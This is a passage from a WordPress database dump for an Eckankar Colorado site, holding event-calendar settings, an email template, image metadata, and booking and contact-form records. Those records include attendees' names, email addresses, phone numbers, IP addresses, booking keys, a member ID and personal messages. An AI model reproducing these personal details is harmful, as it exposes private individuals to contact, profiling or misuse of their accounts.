class=\"col-lge\" style=\"display: inline-block; width: 100%; max-width: 500px; vertical-align: top; padding-bottom: 20px; font-family: Arial,sans-serif; font-size: 18px; line-height: 22px; color: #363636;\"><span style=\"font-size: 20px; color: #333333;\"><strong>A new registration has been submitted for the following event:</strong></span></div>\r\n<div class=\"col-lge\" style=\"display: inline-block; width: 100%; max-width: 500px; vertical-align: top; padding-bottom: 20px; font-family: Arial,sans-serif; font-size: 18px; line-height: 22px; color: #363636;\"><br />\r\n<div style=\"font-family: inherit; text-align: inherit;\"><span style=\"font-size: 19px; color: #23507d;\"><strong>%%event_title%%</strong></span></div>\r\n<div></div>\r\n<div style=\"font-family: inherit; text-align: inherit;\"><span style=\"font-size: 19px; color: #23507d;\"><strong>Date: </strong></span><span style=\"font-size: 19px; color: #333333;\"><strong>%%event_start_date%%</strong></span></div>\r\n<div style=\"font-family: inherit; text-align: inherit;\"><span style=\"font-size: 19px; color: #23507d;\"><strong>Time: </strong></span><span style=\"font-size: 19px; color: #333333;\"><strong>%%event_start_time%%</strong></span></div>\r\n</div>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 20px; font-size: 16px; line-height: 28px; background-color: #efefef; border-bottom: 1px solid rgba(201, 201, 207, 0.35); border-top-color: rgba(201, 201, 207, 0.35); border-right-color: rgba(201, 201, 207, 0.35); border-left-color: rgba(201, 201, 207, 0.35); text-align: left;\"><span style=\"font-size: 14pt;\">%%attendees_full_info%%</span></td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 10px; background-color: #6e6e6e;\">\r\n<figure style=\"text-align: center;\"><span style=\"font-family: arial, helvetica, sans-serif;\"><img src=\"https://eckankar-colorado.org/wp-content/uploads/2021/05/fb-icon-email.png\" alt=\"f\" width=\"40\" height=\"40\" /> </span></figure>\r\n<figure style=\"text-align: center;\"><span style=\"font-size: 14px; line-height: 20px; color: #cccccc; margin: 0px; font-family: arial, helvetica, sans-serif;\">© Eckankar In Colorado -2022</span></figure>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<p><!-- [if mso]>\r\n          </td>\r\n</tr>\r\n</table>\r\n<p>          <![endif]--></p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\";}}'),(167496,266996,'mec_event_status','EventScheduled'),(167497,266996,'mec_moved_online_link',''),(167498,266996,'mec_cancelled_reason',''),(167499,266996,'mec_display_cancellation_reason_in_single_page',''),(167500,266996,'protect_children',''),(167501,266996,'passster_activate_global_protection',NULL),(167502,266996,'passster_activate_protection',NULL),(167503,266996,'passster_protection_type','password'),(167504,266996,'boldgrid_hide_page_title','0'),(167505,266996,'_oembed_ace4d65561aa575fe8833c60d61f4161','{{unknown}}'),(167506,266996,'boldgrid_in_page_containers','1'),(167510,266996,'_dp_original','266540'),(167508,266996,'_thumbnail_id','266997'),(167509,266996,'_wp_old_date','2022-04-30'),(167511,266996,'_edit_lock','1659396176:15'),(167512,266995,'smush-info','Failed with error code invalid_file_type - /home/eckank5/public_html/wp-content/uploads/2022/08/GoldenHeart.webp - cannot be optimized, it has an invalid file type'),(167513,266995,'smush-complete',''),(167514,266996,'_edit_last','15'),(167515,266997,'_wp_attached_file','2022/08/Bridge.webp'),(167516,266997,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:676;s:6:\"height\";i:380;s:4:\"file\";s:19:\"2022/08/Bridge.webp\";s:8:\"filesize\";i:20368;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:19:\"Bridge-300x169.webp\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:7404;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:19:\"Bridge-150x150.webp\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:4156;}s:9:\"thumblist\";a:5:{s:4:\"file\";s:19:\"Bridge-300x300.webp\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:10460;}s:16:\"meccarouselthumb\";a:5:{s:4:\"file\";s:19:\"Bridge-474x324.webp\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:15096;}s:10:\"gridsquare\";a:5:{s:4:\"file\";s:19:\"Bridge-391x260.webp\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:11878;}s:8:\"tileview\";a:5:{s:4:\"file\";s:19:\"Bridge-300x380.webp\";s:5:\"width\";i:300;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:11760;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(167517,266997,'smush-info','Failed with error code invalid_file_type - /home/eckank5/public_html/wp-content/uploads/2022/08/Bridge.webp - cannot be optimized, it has an invalid file type'),(167518,266997,'smush-complete',''),(167519,266998,'protect_children',''),(167520,266998,'mec_color',''),(167521,266998,'mec_location_id','131'),(167522,266998,'mec_dont_show_map','0'),(167523,266998,'mec_organizer_id','1'),(167524,266998,'mec_start_date','2022-08-28'),(167525,266998,'mec_start_time_hour','1'),(167526,266998,'mec_start_time_minutes','0'),(167527,266998,'mec_start_time_ampm','PM'),(167528,266998,'mec_start_day_seconds','46800'),(167529,266998,'mec_end_date','2022-08-28'),(167530,266998,'mec_end_time_hour','2'),(167531,266998,'mec_end_time_minutes','30'),(167532,266998,'mec_end_time_ampm','PM'),(167533,266998,'mec_end_day_seconds','52200'),(167534,266998,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2022-08-28\";s:4:\"hour\";s:1:\"1\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2022-08-28\";s:4:\"hour\";s:1:\"2\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(167535,266998,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(167536,266998,'mec_certain_weekdays','a:0:{}'),(167537,266998,'mec_allday','0'),(167538,266998,'mec_hide_time','0'),(167539,266998,'mec_hide_end_time','0'),(167540,266998,'mec_comment',''),(167541,266998,'mec_repeat_status','0'),(167542,266998,'mec_repeat_type',''),(167543,266998,'mec_repeat_interval','1'),(167544,266998,'mec_repeat_end',''),(167545,266998,'mec_repeat_end_at_occurrences',''),(167546,266998,'mec_repeat_end_at_date',''),(167547,266998,'mec_advanced_days','a:0:{}'),(167548,266998,'mec_in_days',''),(167549,266998,'mec_not_in_days',''),(167550,266998,'mec_hourly_schedules','a:0:{}'),(167551,266998,'mec_booking','a:22:{s:24:\"bookings_limit_unlimited\";s:1:\"0\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:35:\"last_few_tickets_percentage_inherit\";s:1:\"1\";s:27:\"last_few_tickets_percentage\";s:3:\"100\";s:21:\"thankyou_page_inherit\";s:1:\"1\";s:21:\"booking_thankyou_page\";s:0:\"\";s:26:\"booking_thankyou_page_time\";s:4:\"2000\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(167552,266998,'mec_tickets','a:0:{}'),(167553,266998,'mec_fees_global_inheritance','1'),(167554,266998,'mec_fees','a:0:{}'),(167555,266998,'mec_ticket_variations_global_inheritance','1'),(167556,266998,'mec_ticket_variations','a:0:{}'),(167557,266998,'mec_reg_fields_global_inheritance','1'),(167558,266998,'mec_reg_fields','a:0:{}'),(167559,266998,'mec_op','a:0:{}'),(167560,266998,'mec_event_date_submit','20210422105713'),(167561,266998,'mec_read_more',''),(167562,266998,'mec_more_info',''),(167563,266998,'mec_more_info_title',''),(167564,266998,'mec_more_info_target','_self'),(167565,266998,'mec_cost',''),(167566,266998,'mec_currency','a:0:{}'),(167567,266998,'mec_additional_organizer_ids','a:0:{}'),(167568,266998,'mec_additional_location_ids','a:0:{}'),(167569,266998,'one_occurrence','0'),(167570,266998,'mec_timezone','global'),(167571,266998,'mec_countdown_method','global'),(167572,266998,'mec_public','1'),(167573,266998,'mec_bfixed_fields','a:0:{}'),(167574,266998,'mec_fields','a:0:{}'),(167575,266998,'mec_event_status','EventScheduled'),(167576,266998,'mec_moved_online_link',''),(167577,266998,'mec_cancelled_reason',''),(167578,266998,'mec_display_cancellation_reason_in_single_page',''),(167579,266998,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(167580,266998,'passster_activate_global_protection',NULL),(167581,266998,'passster_activate_protection',NULL),(167582,266998,'passster_protection_type','password'),(167583,266998,'_wp_old_date','2022-01-18'),(167584,266998,'boldgrid_in_page_containers','1'),(167587,266998,'_dp_original','266827'),(167586,266998,'_oembed_feb482e9f1973a04e96ed04d346ebf98','{{unknown}}'),(167588,266998,'_edit_lock','1659446276:15'),(167589,266998,'_edit_last','15'),(167590,266998,'_thumbnail_id','266816'),(167591,266532,'mec_location_id','0'),(167592,266532,'mec_additional_location_ids','a:0:{}'),(167593,266532,'mec_organizer_id','0'),(167594,266532,'mec_additional_organizer_ids','a:0:{}'),(167595,266532,'ao_post_optimize','a:6:{s:16:\"ao_post_optimize\";s:2:\"on\";s:19:\"ao_post_js_optimize\";s:2:\"on\";s:20:\"ao_post_css_optimize\";s:2:\"on\";s:12:\"ao_post_ccss\";s:2:\"on\";s:16:\"ao_post_lazyload\";s:2:\"on\";s:15:\"ao_post_preload\";s:0:\"\";}'),(194014,181536,'passster_area_shortcode',''),(167602,181536,'ao_post_optimize','a:6:{s:16:\"ao_post_optimize\";s:2:\"on\";s:19:\"ao_post_js_optimize\";s:2:\"on\";s:20:\"ao_post_css_optimize\";s:2:\"on\";s:12:\"ao_post_ccss\";s:2:\"on\";s:16:\"ao_post_lazyload\";s:2:\"on\";s:15:\"ao_post_preload\";s:0:\"\";}'),(167603,181536,'passster_activate_global_protection',NULL),(167604,181536,'passster_activate_protection',NULL),(167605,181536,'passster_protection_type','password'),(167606,181536,'protect_children',''),(167607,267012,'protect_children',''),(167608,267012,'boldgrid_in_page_containers','1'),(167609,267012,'_bgppb_default_editor','bgppb'),(167610,267012,'mec_location_id','0'),(167611,267012,'mec_additional_location_ids','a:0:{}'),(167612,267012,'mec_organizer_id','0'),(167613,267012,'mec_additional_organizer_ids','a:0:{}'),(167614,267012,'_dp_original','262037'),(167615,267012,'_edit_lock','1695009141:2'),(167616,267012,'_edit_last','2'),(167645,266871,'_oembed_time_17282f16a653c991eb4e3d6f9f01f652','1660411725'),(167633,267021,'_field_312','Deborah'),(167634,267021,'_field_313','Maples'),(167635,267021,'_field_333','3169900346'),(167636,267021,'_field_314','debbiem4455@gmail.com'),(167637,267021,'_field_315','How far away?'),(167638,267021,'_field_316','I live in Parker.  Where are you located in the Springs?'),(167639,267021,'_form_id','35'),(167640,267021,'_seq_num','49'),(169414,267201,'_wp_attached_file','2022/09/unsplash-wave-surfer-1.jpg'),(167644,266871,'_oembed_17282f16a653c991eb4e3d6f9f01f652','<iframe title=\"Eckankar Youth: Just Sing HU! - Ancient Spiritual Exercise\" width=\"420\" height=\"315\" src=\"https://www.youtube.com/embed/wc9N_g2NolA?feature=oembed\" frameborder=\"0\" allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture\" allowfullscreen></iframe>'),(167625,267018,'_wp_attached_file','2022/07/2022-satsang-promo-bk-3.jpg'),(167626,267018,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:540;s:6:\"height\";i:360;s:4:\"file\";s:35:\"2022/07/2022-satsang-promo-bk-3.jpg\";s:8:\"filesize\";i:50465;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:35:\"2022-satsang-promo-bk-3-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:16500;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:35:\"2022-satsang-promo-bk-3-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6550;}s:9:\"thumblist\";a:5:{s:4:\"file\";s:35:\"2022-satsang-promo-bk-3-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19662;}s:16:\"meccarouselthumb\";a:5:{s:4:\"file\";s:35:\"2022-satsang-promo-bk-3-474x324.jpg\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:34482;}s:10:\"gridsquare\";a:5:{s:4:\"file\";s:35:\"2022-satsang-promo-bk-3-391x260.jpg\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:24924;}s:8:\"tileview\";a:5:{s:4:\"file\";s:35:\"2022-satsang-promo-bk-3-300x360.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:360;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:24279;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(188223,268837,'mec_op','a:0:{}'),(188224,268837,'mec_fields','a:0:{}'),(188222,268837,'mec_bfixed_fields','a:0:{}'),(167629,267018,'original-file','2022/07/2022-satsang-promo-bk-3-updraft-pre-smush-original.jpg'),(167630,267018,'smush-complete','1'),(167631,267018,'smush-info','The file was compressed from 49.28 KB to 48.22 KB saving 2.16 percent using WP-Optimize'),(167632,267018,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:50465;s:12:\"smushed-size\";i:49375;s:15:\"savings-percent\";d:2.16;s:10:\"sizes-info\";a:7:{s:4:\"full\";a:2:{s:8:\"original\";i:50465;s:10:\"compressed\";i:49375;}s:6:\"medium\";a:2:{s:8:\"original\";i:16500;s:10:\"compressed\";i:16500;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:6550;s:10:\"compressed\";i:6550;}s:9:\"thumblist\";a:2:{s:8:\"original\";i:19662;s:10:\"compressed\";i:19662;}s:16:\"meccarouselthumb\";a:2:{s:8:\"original\";i:34482;s:10:\"compressed\";i:34482;}s:10:\"gridsquare\";a:2:{s:8:\"original\";i:24924;s:10:\"compressed\";i:24924;}s:8:\"tileview\";a:2:{s:8:\"original\";i:24279;s:10:\"compressed\";i:24279;}}}'),(167646,267025,'mec_transaction_id','NPY55281'),(167647,267025,'mec_user_id','1000039'),(167648,267025,'mec_verified','1'),(167649,267025,'mec_verification_key','5d70de1d32727e55e9092750d0ceea04'),(167650,267025,'mec_cancellation_key','1fa36df851f9784dfb68383d1499937b'),(167651,267025,'mec_confirmed','1'),(167652,267025,'mec_event_id','266996'),(167653,267025,'mec_date','1660473000:1660476600'),(167654,267025,'mec_ticket_id',',1,'),(167655,267025,'mec_booking_time','2022-08-13 11:49:41'),(167656,267025,'mec_all_dates','a:0:{}'),(167657,267025,'mec_other_dates','a:0:{}'),(167658,267025,'mec_attention_time','1660473000:1660476600'),(167659,267025,'mec_attention_time_start','1660473000'),(167660,267025,'mec_attention_time_end','1660476600'),(167661,267025,'mec_book_date_submit','20220813114941'),(167662,267025,'mec_booking_location','129'),(167663,267025,'mec_ticket_price_1','0'),(167664,267025,'mec_attendees','a:1:{i:0;a:5:{s:5:\"email\";s:18:\"n.condon@yahoo.com\";s:4:\"name\";s:5:\"Nancy\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:7:\"buyerip\";s:15:\"204.144.183.245\";}}'),(167665,267025,'mec_price','0'),(167666,267025,'mec_gateway','MEC_gateway_free'),(167667,267025,'mec_gateway_label','Free'),(167668,267026,'mec_transaction_id','ENQ21914'),(167669,267026,'mec_user_id','1000023'),(167670,267026,'mec_verified','1'),(167671,267026,'mec_verification_key','0419f08588a83b4de9d0d069db9df8df'),(167672,267026,'mec_cancellation_key','d23dcbbb942ef5e61048c107d95ccc77'),(167673,267026,'mec_confirmed','1'),(167674,267026,'mec_event_id','266996'),(167675,267026,'mec_date','1660473000:1660476600'),(167676,267026,'mec_ticket_id',',1,'),(167677,267026,'mec_booking_time','2022-08-13 19:50:28'),(167678,267026,'mec_all_dates','a:0:{}'),(167679,267026,'mec_other_dates','a:0:{}'),(167680,267026,'mec_attention_time','1660473000:1660476600'),(167681,267026,'mec_attention_time_start','1660473000'),(167682,267026,'mec_attention_time_end','1660476600'),(167683,267026,'mec_book_date_submit','20220813195028'),(167684,267026,'mec_booking_location','129'),(167685,267026,'mec_ticket_price_1','0'),(167686,267026,'mec_attendees','a:1:{i:0;a:5:{s:5:\"email\";s:19:\"bngstreet@gmail.com\";s:4:\"name\";s:18:\"Bonnie Greenstreet\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:7:\"buyerip\";s:12:\"184.55.32.29\";}}'),(167687,267026,'mec_price','0'),(167688,267026,'mec_gateway','MEC_gateway_free'),(167689,267026,'mec_gateway_label','Free'),(167690,267027,'mec_transaction_id','GNP97349'),(167691,267027,'mec_user_id','1000022'),(167692,267027,'mec_verified','1'),(167693,267027,'mec_verification_key','01ef35110f68916046d2041e25801c09'),(167694,267027,'mec_cancellation_key','bcc52eff2866455602aa0277901c1e47'),(167695,267027,'mec_confirmed','1'),(167696,267027,'mec_event_id','266996'),(167697,267027,'mec_date','1660473000:1660476600'),(167698,267027,'mec_ticket_id',',1,'),(167699,267027,'mec_booking_time','2022-08-14 09:58:28'),(167700,267027,'mec_all_dates','a:0:{}'),(167701,267027,'mec_other_dates','a:0:{}'),(167702,267027,'mec_attention_time','1660473000:1660476600'),(167703,267027,'mec_attention_time_start','1660473000'),(167704,267027,'mec_attention_time_end','1660476600'),(167705,267027,'mec_book_date_submit','20220814095828'),(167706,267027,'mec_booking_location','129'),(167707,267027,'mec_ticket_price_1','0'),(167708,267027,'mec_attendees','a:1:{i:0;a:5:{s:5:\"email\";s:20:\"jiuuumaluk@gmail.com\";s:4:\"name\";s:14:\"Jorge Santiago\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:7:\"buyerip\";s:11:\"24.2.65.250\";}}'),(167709,267027,'mec_price','0'),(167710,267027,'mec_gateway','MEC_gateway_free'),(167711,267027,'mec_gateway_label','Free'),(167712,267028,'mec_transaction_id','NVD41326'),(167713,267028,'mec_user_id','1000040'),(167714,267028,'mec_verified','1'),(167715,267028,'mec_verification_key','fba7aa84369a961676720e0d1ca57405'),(167716,267028,'mec_cancellation_key','5cc203209433cba0328ab7d817ad9080'),(167717,267028,'mec_confirmed','1'),(167718,267028,'mec_event_id','266996'),(167719,267028,'mec_date','1660473000:1660476600'),(167720,267028,'mec_ticket_id',',1,'),(167721,267028,'mec_booking_time','2022-08-14 10:20:07'),(167722,267028,'mec_all_dates','a:0:{}'),(167723,267028,'mec_other_dates','a:0:{}'),(167724,267028,'mec_attention_time','1660473000:1660476600'),(167725,267028,'mec_attention_time_start','1660473000'),(167726,267028,'mec_attention_time_end','1660476600'),(167727,267028,'mec_book_date_submit','20220814102007'),(167728,267028,'mec_booking_location','129'),(167729,267028,'mec_ticket_price_1','0'),(167730,267028,'mec_attendees','a:1:{i:0;a:5:{s:5:\"email\";s:24:\"darlenerreed@comcast.net\";s:4:\"name\";s:12:\"Darlene Reed\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:7:\"buyerip\";s:13:\"67.44.160.231\";}}'),(167731,267028,'mec_price','0'),(167732,267028,'mec_gateway','MEC_gateway_free'),(167733,267028,'mec_gateway_label','Free'),(167734,267029,'mec_transaction_id','KHZ16572'),(167735,267029,'mec_user_id','1000024'),(167736,267029,'mec_verified','1'),(167737,267029,'mec_verification_key','5e15bfe828c6e7118845d395604f9ce5'),(167738,267029,'mec_cancellation_key','1f55125efd6265c3cfc4124e7c2fb1e7'),(167739,267029,'mec_confirmed','1'),(167740,267029,'mec_event_id','266996'),(167741,267029,'mec_date','1660473000:1660476600'),(167742,267029,'mec_ticket_id',',1,'),(167743,267029,'mec_booking_time','2022-08-14 10:26:24'),(167744,267029,'mec_all_dates','a:0:{}'),(167745,267029,'mec_other_dates','a:0:{}'),(167746,267029,'mec_attention_time','1660473000:1660476600'),(167747,267029,'mec_attention_time_start','1660473000'),(167748,267029,'mec_attention_time_end','1660476600'),(167749,267029,'mec_book_date_submit','20220814102624'),(167750,267029,'mec_booking_location','129'),(167751,267029,'mec_ticket_price_1','0'),(167752,267029,'mec_attendees','a:1:{i:0;a:5:{s:5:\"email\";s:20:\"rmorandi@comcast.net\";s:4:\"name\";s:13:\"Roger Morandi\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:7:\"buyerip\";s:13:\"73.98.136.116\";}}'),(167753,267029,'mec_price','0'),(167754,267029,'mec_gateway','MEC_gateway_free'),(167755,267029,'mec_gateway_label','Free'),(167756,267030,'mec_transaction_id','DKQ16933'),(167757,267030,'mec_user_id','1000041'),(167758,267030,'mec_verified','1'),(167759,267030,'mec_verification_key','63f014b5f01827c96a835384908b2f61'),(167760,267030,'mec_cancellation_key','69cd447adaded7dfa971b4514bf02ac1'),(167761,267030,'mec_confirmed','1'),(167762,267030,'mec_event_id','266996'),(167763,267030,'mec_date','1660473000:1660476600'),(167764,267030,'mec_ticket_id',',1,'),(167765,267030,'mec_booking_time','2022-08-14 10:27:22'),(167766,267030,'mec_all_dates','a:0:{}'),(167767,267030,'mec_other_dates','a:0:{}'),(167768,267030,'mec_attention_time','1660473000:1660476600'),(167769,267030,'mec_attention_time_start','1660473000'),(167770,267030,'mec_attention_time_end','1660476600'),(167771,267030,'mec_book_date_submit','20220814102722'),(167772,267030,'mec_booking_location','129'),(167773,267030,'mec_ticket_price_1','0'),(167774,267030,'mec_attendees','a:1:{i:0;a:5:{s:5:\"email\";s:24:\"russellvreed@comcast.net\";s:4:\"name\";s:12:\"Russell Reed\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:7:\"buyerip\";s:13:\"67.44.160.231\";}}'),(167775,267030,'mec_price','0'),(167776,267030,'mec_gateway','MEC_gateway_free'),(167777,267030,'mec_gateway_label','Free'),(167778,267031,'mec_transaction_id','FRH10759'),(167779,267031,'mec_user_id','1000042'),(167780,267031,'mec_verified','1'),(167781,267031,'mec_verification_key','555eb7a5e0a3916e6f328207eee4093d'),(167782,267031,'mec_cancellation_key','62524e702a693a9e8187efc4b26f40e6'),(167783,267031,'mec_confirmed','1'),(167784,267031,'mec_event_id','266996'),(167785,267031,'mec_date','1660473000:1660476600'),(167786,267031,'mec_ticket_id',',1,'),(167787,267031,'mec_booking_time','2022-08-14 10:28:43'),(167788,267031,'mec_all_dates','a:0:{}'),(167789,267031,'mec_other_dates','a:0:{}'),(167790,267031,'mec_attention_time','1660473000:1660476600'),(167791,267031,'mec_attention_time_start','1660473000'),(167792,267031,'mec_attention_time_end','1660476600'),(167793,267031,'mec_book_date_submit','20220814102843'),(167794,267031,'mec_booking_location','129'),(167795,267031,'mec_ticket_price_1','0'),(167796,267031,'mec_attendees','a:1:{i:0;a:5:{s:5:\"email\";s:20:\"lmrousseau@gmail.com\";s:4:\"name\";s:19:\"Lisa-Marie Rousseau\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:7:\"buyerip\";s:12:\"68.46.83.226\";}}'),(167797,267031,'mec_price','0'),(167798,267031,'mec_gateway','MEC_gateway_free'),(167799,267031,'mec_gateway_label','Free'),(169772,267226,'mec_verification_key','8ec4a9995fd7c48ba5a2e8e40d88265b'),(169769,267226,'mec_transaction_id','CNR30256'),(169770,267226,'mec_user_id','1000015'),(169771,267226,'mec_verified','1'),(167807,267035,'_field_55','Rhonda'),(167808,267035,'_field_56','Miller'),(167809,267035,'_field_57','rhoann9@gmail.com'),(167810,267035,'_field_58','(303) 946-0436'),(167811,267035,'_field_59','Boulder'),(167812,267035,'_field_62','esa-initiator-becky-crandell'),(167813,267035,'_field_63','Becky,\nI would like to please set up an ESA session with you at your convenience. I can meet at a location most convenient for you. \nThank you sincerely,\nRhonda Miller\nBoulder, CO\nECKANKAR ID #2230316'),(167814,267035,'_form_id','6'),(167815,267035,'_seq_num','4'),(167816,267036,'_field_224','Rhonda'),(167817,267036,'_field_225','Miller'),(167818,267036,'_field_226','rhoann9@gmail.com'),(167819,267036,'_field_227','CO'),(167820,267036,'_field_228','US'),(167821,267036,'_field_229','a:1:{i:0;s:39:\"Central Colorado/ECK Temple in Colorado\";}'),(167822,267036,'_form_id','21'),(167823,267036,'_seq_num','155'),(167824,267037,'mec_color',''),(167825,267037,'mec_location_id','122'),(167826,267037,'mec_dont_show_map','0'),(167827,267037,'mec_organizer_id','1'),(167828,267037,'mec_read_more',''),(167829,267037,'mec_more_info',''),(167830,267037,'mec_more_info_title',''),(167831,267037,'mec_more_info_target','_self'),(167832,267037,'mec_cost',''),(167833,267037,'mec_currency','a:0:{}'),(167834,267037,'mec_additional_organizer_ids','a:0:{}'),(167835,267037,'mec_additional_location_ids','a:0:{}'),(167836,267037,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2022-09-25\";s:4:\"hour\";s:2:\"10\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2022-09-25\";s:4:\"hour\";s:2:\"11\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(167837,267037,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(167838,267037,'mec_certain_weekdays','a:0:{}'),(167839,267037,'mec_allday','0'),(167840,267037,'one_occurrence','0'),(167841,267037,'mec_hide_time','0'),(167842,267037,'mec_hide_end_time','0'),(167843,267037,'mec_comment',''),(167844,267037,'mec_timezone','global'),(167845,267037,'mec_countdown_method','global'),(167846,267037,'mec_public','1'),(167847,267037,'mec_start_date','2022-09-25'),(167848,267037,'mec_start_time_hour','10'),(167849,267037,'mec_start_time_minutes','30'),(167850,267037,'mec_start_time_ampm','AM'),(167851,267037,'mec